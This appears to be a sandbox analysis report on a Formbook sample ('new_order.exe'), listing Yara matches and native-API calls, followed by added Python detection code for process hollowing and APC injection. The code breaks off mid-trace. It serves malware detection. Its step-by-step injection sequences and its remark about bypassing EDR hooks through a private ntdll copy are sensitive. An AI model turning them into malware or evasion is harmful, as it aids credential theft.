          Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: initial sample | Static PE information: Filename: new_order.exe
Source: new_order.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_0040604C
Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_00404772
Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_02180A17
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00401030
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041DB0E
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041EB8D
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041E5DC
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00402D90
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041D596
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00409E4B
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00409E50
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041EFC2
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00402FB0
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A820A0
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00B220A8
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A6B090
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00B11002
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A74120
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A5F900
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00B222AE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0491B090
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0491841F
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049C1002
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04932581
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0491D5E0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0490F900
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04900D20
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04924120
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049D1D55
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04926E30
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0493EBB0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041DB0E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041EB8D
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041E5DC
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_00402D90
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041D596
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_00409E4B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_00409E50
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041EFC2
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_00402FB0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 0490B150 appears 32 times
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041A350 NtCreateFile,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041A400 NtReadFile,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041A480 NtClose,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041A530 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041A3A2 NtCreateFile,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041A47A NtClose,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_0041A52A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A998F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A999A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A995D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A996E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A997A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A998A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99820 NtEnumerateKey,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A9B040 NtSuspendThread,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A999D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99950 NtQueueApcThread,
Source: C:\Users\user\Desktop\new_order.exe | Code function: 3_2_00A99A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049499A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049495D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049496D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049496E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049498A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049498F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0494B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049499D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049495F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0494AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949560 NtWriteFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949A10 NtQuerySection,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949A20 NtResumeThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0494A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_049497A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0494A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0494A770 NtOpenThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04949760 NtOpenProcess,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041A350 NtCreateFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041A400 NtReadFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041A480 NtClose,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041A530 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041A3A2 NtCreateFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041A47A NtClose,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0041A52A NtAllocateVirtualMemory,
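The native-API inventory above is the raw material for the report's injection verdicts (process hollowing, APC queuing, thread-context modification): NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtMapViewOfSection, NtSetContextThread, NtQueueApcThread and NtResumeThread are all present in both the re-launched sample (PID 3) and the SysWOW64 explorer.exe (PID 9). Two details matter for anyone building detection from this. First, a list of APIs is not a verdict; what distinguishes hollowing from a normal loader is the order of the calls and the fact that they target a different process. Second, the stubs the report lists for PID 3 sit at 0x00A99xxx, inside the region the report attributes to wntdll.pdb at 0x00A30000 (and 0x04949xxx inside 0x048E0000 for PID 9) rather than in the originally loaded ntdll, which suggests the calls go through a privately loaded copy of ntdll; inline hooks placed on the original ntdll by a user-mode EDR component would not see them, so the trace a detector consumes should come from the sandbox's own instrumentation, ETW or a kernel driver. The following added example (written for this page, not Joe Sandbox code) turns the two patterns into an ordered-step matcher over a cross-process API trace. TRACE is constructed to mirror the report's chain, with illustrative PIDs: PID 1 hollows PID 3, PID 3 injects into PID 5 (the 64-bit explorer.exe whose memory the Yara rules matched).

```python
"""Stage-sequence detector for cross-process native-API traces.

Added example, not Joe Sandbox code. TRACE is constructed to mirror the
report's chain (PIDs are illustrative): PID 1 (first new_order.exe)
hollows PID 3 (the re-launched copy); PID 3 injects into PID 5 (explorer).
"""
from collections import defaultdict

# Each technique is an ordered list of steps; a step is satisfied by any
# API named in its set. Unrelated calls may be interleaved between steps.
PATTERNS = {
    "process_hollowing": [
        {"NtCreateProcessEx", "NtCreateUserProcess"},   # child created (suspended)
        {"NtUnmapViewOfSection"},                       # original image evicted
        {"NtWriteVirtualMemory", "NtMapViewOfSection"}, # payload placed in child
        {"NtSetContextThread"},                         # entry point redirected
        {"NtResumeThread"},                             # child runs the payload
    ],
    "apc_injection": [
        {"NtWriteVirtualMemory", "NtMapViewOfSection"}, # code placed in target
        {"NtQueueApcThread"},                           # APC pointed at it
        {"NtResumeThread", "NtAlertResumeThread"},      # target thread runs it
    ],
}


def matches_in_order(apis, steps):
    """True if `apis` contains one call per step, in step order."""
    step = 0
    for api in apis:
        if api in steps[step]:
            step += 1
            if step == len(steps):
                return True
    return False


def detect_injection(trace):
    """trace: iterable of (caller_pid, api_name, target_pid).

    Only cross-process calls are examined: the same APIs are routine when a
    process operates on its own address space (allocation, section mapping).
    Returns (technique, caller_pid, target_pid) tuples.
    """
    per_pair = defaultdict(list)
    for caller, api, target in trace:
        if target != caller:
            per_pair[(caller, target)].append(api)
    findings = []
    for (caller, target), apis in per_pair.items():
        for technique, steps in PATTERNS.items():
            if matches_in_order(apis, steps):
                findings.append((technique, caller, target))
    return findings


# Constructed trace (not taken from the report's API log).
TRACE = [
    (1, "NtCreateUserProcess", 3),
    (1, "NtUnmapViewOfSection", 3),
    (1, "NtAllocateVirtualMemory", 3),
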